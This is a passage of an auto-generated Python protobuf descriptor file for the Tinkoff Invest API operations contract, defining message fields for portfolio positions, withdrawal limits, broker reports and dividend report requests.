serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='futures', full_name='tinkoff.public.invest.api.contract.v1.PositionsResponse.futures', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1831,
serialized_end=2174,
)
_WITHDRAWLIMITSREQUEST = _descriptor.Descriptor(
name='WithdrawLimitsRequest',
full_name='tinkoff.public.invest.api.contract.v1.WithdrawLimitsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='account_id', full_name='tinkoff.public.invest.api.contract.v1.WithdrawLimitsRequest.account_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2176,
serialized_end=2219,
)
_WITHDRAWLIMITSRESPONSE = _descriptor.Descriptor(
name='WithdrawLimitsResponse',
full_name='tinkoff.public.invest.api.contract.v1.WithdrawLimitsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='money', full_name='tinkoff.public.invest.api.contract.v1.WithdrawLimitsResponse.money', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='blocked', full_name='tinkoff.public.invest.api.contract.v1.WithdrawLimitsResponse.blocked', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='blocked_guarantee', full_name='tinkoff.public.invest.api.contract.v1.WithdrawLimitsResponse.blocked_guarantee', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2222,
serialized_end=2458,
)
_PORTFOLIOPOSITION = _descriptor.Descriptor(
name='PortfolioPosition',
full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='figi', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.figi', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='instrument_type', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.instrument_type', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quantity', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.quantity', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='average_position_price', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.average_position_price', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='expected_yield', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.expected_yield', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='current_nkd', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.current_nkd', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='average_position_price_pt', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.average_position_price_pt', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='current_price', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.current_price', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='average_position_price_fifo', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.average_position_price_fifo', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quantity_lots', full_name='tinkoff.public.invest.api.contract.v1.PortfolioPosition.quantity_lots', index=9,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2461,
serialized_end=3136,
)
_POSITIONSSECURITIES = _descriptor.Descriptor(
name='PositionsSecurities',
full_name='tinkoff.public.invest.api.contract.v1.PositionsSecurities',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='figi', full_name='tinkoff.public.invest.api.contract.v1.PositionsSecurities.figi', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='blocked', full_name='tinkoff.public.invest.api.contract.v1.PositionsSecurities.blocked', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='balance', full_name='tinkoff.public.invest.api.contract.v1.PositionsSecurities.balance', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3138,
serialized_end=3207,
)
_POSITIONSFUTURES = _descriptor.Descriptor(
name='PositionsFutures',
full_name='tinkoff.public.invest.api.contract.v1.PositionsFutures',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='figi', full_name='tinkoff.public.invest.api.contract.v1.PositionsFutures.figi', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='blocked', full_name='tinkoff.public.invest.api.contract.v1.PositionsFutures.blocked', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='balance', full_name='tinkoff.public.invest.api.contract.v1.PositionsFutures.balance', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3209,
serialized_end=3275,
)
_BROKERREPORTREQUEST = _descriptor.Descriptor(
name='BrokerReportRequest',
full_name='tinkoff.public.invest.api.contract.v1.BrokerReportRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='generate_broker_report_request', full_name='tinkoff.public.invest.api.contract.v1.BrokerReportRequest.generate_broker_report_request', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='get_broker_report_request', full_name='tinkoff.public.invest.api.contract.v1.BrokerReportRequest.get_broker_report_request', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='payload', full_name='tinkoff.public.invest.api.contract.v1.BrokerReportRequest.payload',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=3278,
serialized_end=3520,
)
_BROKERREPORTRESPONSE = _descriptor.Descriptor(
name='BrokerReportResponse',
full_name='tinkoff.public.invest.api.contract.v1.BrokerReportResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='generate_broker_report_response', full_name='tinkoff.public.invest.api.contract.v1.BrokerReportResponse.generate_broker_report_response', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='get_broker_report_response', full_name='tinkoff.public.invest.api.contract.v1.BrokerReportResponse.get_broker_report_response', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='payload', full_name='tinkoff.public.invest.api.contract.v1.BrokerReportResponse.payload',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=3523,
serialized_end=3770,
)
_GENERATEBROKERREPORTREQUEST = _descriptor.Descriptor(
name='GenerateBrokerReportRequest',
full_name='tinkoff.public.invest.api.contract.v1.GenerateBrokerReportRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='account_id', full_name='tinkoff.public.invest.api.contract.v1.GenerateBrokerReportRequest.account_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='from', full_name='tinkoff.public.invest.api.contract.v1.GenerateBrokerReportRequest.from', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='to', full_name='tinkoff.public.invest.api.contract.v1.GenerateBrokerReportRequest.to', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3773,
serialized_end=3904,
)
_GENERATEBROKERREPORTRESPONSE = _descriptor.Descriptor(
name='GenerateBrokerReportResponse',
full_name='tinkoff.public.invest.api.contract.v1.GenerateBrokerReportResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='task_id', full_name='tinkoff.public.invest.api.contract.v1.GenerateBrokerReportResponse.task_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3906,
serialized_end=3953,
)
_GETBROKERREPORTREQUEST = _descriptor.Descriptor(
name='GetBrokerReportRequest',
full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='task_id', full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportRequest.task_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='page', full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportRequest.page', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3955,
serialized_end=4010,
)
_GETBROKERREPORTRESPONSE = _descriptor.Descriptor(
name='GetBrokerReportResponse',
full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='broker_report', full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportResponse.broker_report', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='itemsCount', full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportResponse.itemsCount', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagesCount', full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportResponse.pagesCount', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='page', full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportResponse.page', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4013,
serialized_end=4168,
)
_BROKERREPORT = _descriptor.Descriptor(
name='BrokerReport',
full_name='tinkoff.public.invest.api.contract.v1.BrokerReport',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='trade_id', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.trade_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='order_id', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.order_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='figi', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.figi', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='execute_sign', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.execute_sign', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='trade_datetime', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.trade_datetime', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='exchange', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.exchange', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='class_code', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.class_code', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='direction', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.direction', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.name', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ticker', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.ticker', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='price', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.price', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quantity', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.quantity', index=11,
number=12, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='order_amount', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.order_amount', index=12,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='aci_value', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.aci_value', index=13,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_order_amount', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.total_order_amount', index=14,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='broker_commission', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.broker_commission', index=15,
number=16, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='exchange_commission', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.exchange_commission', index=16,
number=17, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='exchange_clearing_commission', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.exchange_clearing_commission', index=17,
number=18, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='repo_rate', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.repo_rate', index=18,
number=19, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='party', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.party', index=19,
number=20, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='clear_value_date', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.clear_value_date', index=20,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sec_value_date', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.sec_value_date', index=21,
number=22, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='broker_status', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.broker_status', index=22,
number=23, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='separate_agreement_type', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.separate_agreement_type', index=23,
number=24, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='separate_agreement_number', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.separate_agreement_number', index=24,
number=25, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='separate_agreement_date', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.separate_agreement_date', index=25,
number=26, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='delivery_type', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.delivery_type', index=26,
number=27, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4171,
serialized_end=5285,
)
_GETDIVIDENDSFOREIGNISSUERREQUEST = _descriptor.Descriptor(
name='GetDividendsForeignIssuerRequest',
full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='generate_div_foreign_issuer_report', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerRequest.generate_div_foreign_issuer_report', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='get_div_foreign_issuer_report', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerRequest.get_div_foreign_issuer_report', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='payload', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerRequest.payload',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=5288,
serialized_end=5584,
)
_GETDIVIDENDSFOREIGNISSUERRESPONSE = _descriptor.Descriptor(
name='GetDividendsForeignIssuerResponse',
